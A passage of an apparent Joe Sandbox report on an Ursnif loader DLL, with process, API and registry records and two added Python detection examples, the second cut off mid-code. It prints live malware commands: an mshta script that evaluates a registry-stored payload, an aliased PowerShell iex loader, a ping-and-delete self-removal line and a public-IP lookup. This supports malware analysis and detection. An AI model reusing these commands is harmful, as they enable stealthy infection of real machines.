Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
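Added example (not part of the Joe Sandbox report or of any vendor product): host-side detection logic for three behaviours this report records, run over constructed event records. The three are cmd.exe launching "ping localhost -n 5" (the "Uses ping.exe to sleep" / "Self deletion via cmd delete" signatures), explorer.exe writing EnableSPDY3_0 = 0 under HKCU\...\Internet Settings (the "Disables SPDY" signature, a known preparation step for web injects), and registry modification through WMI StdRegProv Set*/CreateKey methods (the "Writes registry values via WMI" signature). The event dicts are constructed in the shape of Sysmon process-create and registry-value-set records and of the WMI method-call lines above; the field names are this example's own, not Sysmon's schema.

```python
"""Detection rules for three behaviours recorded in this report, evaluated over
constructed events.  Added example; field names are this example's own."""
import re

# Constructed events.  Values are taken from the report; the last event is a
# benign control (a real ping, no loopback target, no -n count).
EVENTS = [
    {"type": "process_create", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\PING.EXE", "cmdline": "ping localhost -n 5"},
    {"type": "registry_set", "image": r"C:\Windows\explorer.exe",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings",
     "value": "EnableSPDY3_0", "data": 0},
    {"type": "wmi_method", "image": r"C:\Windows\System32\loaddll32.exe",
     "namespace": r"root\default", "class": "StdRegProv", "method": "SetBinaryValue"},
    {"type": "wmi_method", "image": r"C:\Windows\System32\loaddll32.exe",
     "namespace": r"root\default", "class": "StdRegProv", "method": "GetStringValue"},
    {"type": "process_create", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\PING.EXE", "cmdline": "ping 10.0.0.1"},
]

LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def rule_ping_sleep(ev):
    """ping.exe aimed at loopback with a -n count is a delay, not a reachability check."""
    if ev["type"] != "process_create" or not ev["image"].lower().endswith("ping.exe"):
        return None
    args = [a.lower() for a in ev["cmdline"].split()]
    if "-n" in args and any(a in LOOPBACK for a in args):
        return "ping to loopback with -n used as a sleep (self-delete / delay pattern)"
    return None


def rule_spdy_disabled(ev):
    """EnableSPDY* set to 0 under Internet Settings forces plain HTTP/1.1, easing web injects."""
    if ev["type"] != "registry_set":
        return None
    if (ev["key"].lower().endswith(r"\internet settings")
            and ev["value"].lower().startswith("enablespdy")
            and ev["data"] == 0):
        return "SPDY disabled in Internet Settings (typical before HTTP web injects)"
    return None


# Only the StdRegProv methods that change the registry; Get* methods are reads.
WMI_WRITE_METHODS = re.compile(r"^(Set\w*Value|CreateKey|DeleteKey|DeleteValue)$")


def rule_wmi_registry_write(ev):
    """Registry change routed through WMI; in host telemetry the writer is WmiPrvSE.exe."""
    if ev["type"] != "wmi_method" or ev["class"] != "StdRegProv":
        return None
    if WMI_WRITE_METHODS.match(ev["method"]):
        return f"registry modified through WMI StdRegProv::{ev['method']}"
    return None


RULES = [
    ("ping_sleep", rule_ping_sleep),
    ("spdy_disabled", rule_spdy_disabled),
    ("wmi_registry_write", rule_wmi_registry_write),
]


def evaluate(events):
    """Run every rule over every event; return (rule_name, image, message) per hit."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((name, ev["image"], msg))
    return hits


if __name__ == "__main__":
    for name, image, msg in evaluate(EVENTS):
        print(f"[{name}] {image}: {msg}")
```

One caveat worth building into a real deployment: a registry write made through StdRegProv is performed by the WMI provider host (WmiPrvSE.exe), not by loaddll32.exe or rundll32.exe, so a registry-event rule keyed on the malware's image name does not see it. That is why the sandbox lists these as WMI method calls attributed to the caller; on an endpoint the equivalent attribution needs WMI call telemetry, not registry telemetry alone.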
Source: 61ee6edf7de65.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B50CB2 1_2_04B50CB2
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B42CB8 1_2_04B42CB8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4F4D0 1_2_04B4F4D0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B51DEA 1_2_04B51DEA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B32D25 1_2_04B32D25
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3F641 1_2_04B3F641
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B368B2 1_2_04B368B2
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B501A5 1_2_04B501A5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B43924 1_2_04B43924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F280D0 3_2_00F280D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F24BB3 3_2_00F24BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F2436E 3_2_00F2436E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A01D92 3_2_05A01D92
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A01DEA 3_2_05A01DEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E2D25 3_2_059E2D25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A00CB2 3_2_05A00CB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F2CB8 3_2_059F2CB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FF4D0 3_2_059FF4D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A01418 3_2_05A01418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EF641 3_2_059EF641
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A001A5 3_2_05A001A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F3924 3_2_059F3924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E68B2 3_2_059E68B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A07358 3_2_05A07358
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B49499 CreateProcessAsUserW, 1_2_04B49499
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3D4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_04B3D4F4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3E4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_04B3E4DC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_04B3B45A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B44560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_04B44560
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4BEBC GetProcAddress,NtCreateSection,memset, 1_2_04B4BEBC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4D6E3 NtQueryInformationProcess, 1_2_04B4D6E3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B53E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04B53E7D
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3A7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_04B3A7FE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B40FE0 NtMapViewOfSection, 1_2_04B40FE0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3AFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_04B3AFD1
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B36F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_04B36F70
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B470AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04B470AC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3ECE9 NtGetContextThread,RtlNtStatusToDosError, 1_2_04B3ECE9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B52588 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_04B52588
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B31D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_04B31D70
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B33EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_04B33EBE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4F0CC memset,NtQueryInformationProcess, 1_2_04B4F0CC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4A1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_04B4A1FC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04B4595B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_04B4630F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F24AAF NtMapViewOfSection, 3_2_00F24AAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F22F8D GetProcAddress,NtCreateSection,memset, 3_2_00F22F8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F2373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_00F2373D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F282F5 NtQueryVirtualMemory, 3_2_00F282F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_059F4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_059EE4DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059ED4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_059ED4F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_059EB45A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_059EAFD1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_059EA7FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F0FE0 NtMapViewOfSection, 3_2_059F0FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_059E6F70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FBEBC GetProcAddress,NtCreateSection,memset, 3_2_059FBEBC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FD6E3 NtQueryInformationProcess, 3_2_059FD6E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A03E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_05A03E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_059F70AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A02588 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_05A02588
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_059E1D70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EECE9 NtGetContextThread,RtlNtStatusToDosError, 3_2_059EECE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_059E3EBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_059FA1FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_059F595B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FF0CC memset,NtQueryInformationProcess, 3_2_059FF0CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_059F630F
Source: 61ee6edf7de65.dll Binary or memory string: OriginalFilenameAnhydrou> vs 61ee6edf7de65.dll
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 61ee6edf7de65.dll Virustotal: Detection: 24%
Source: 61ee6edf7de65.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wulb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wulb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vn1t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vn1t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\442E.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\442E.bi1"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
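Read together, the process-creation records above are the Ursnif loader chain: loaddll32/rundll32 and control.exe -h carry the injection into explorer.exe; mshta.exe runs an inline HTA that regread()s a value under HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E and eval()s it; that mshta spawns PowerShell, which hides Invoke-Expression behind a throwaway alias and executes a second value (UtilDiagram) from the same key; PowerShell then drives csc.exe with response files in %TEMP%, the footprint of Add-Type compiling C# on the fly; and explorer.exe runs cmd to ping-sleep and delete the original DLL and to learn the public IP via myip.opendns.com. The Python below is an added example, not part of the sandbox report or the sample, that turns those records into detection rules. The rule names, the record parser and the assumption that every record reads "Source: <parent> Process created: <child image> <command line>" with space-free image paths are this example's own; the sample input is a subset of the records above.

```python
"""Flag the Ursnif loader chain in this report's 'Process created' records.

Added example for this report, not Joe Sandbox code. SAMPLE is a subset of the
process-creation records above; the rule names, the parser and the assumption
that a record reads 'Source: <parent> Process created: <child image> <cmdline>'
with space-free image paths (true for every record here) are this example's own.
"""
import re

SAMPLE = r"""
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
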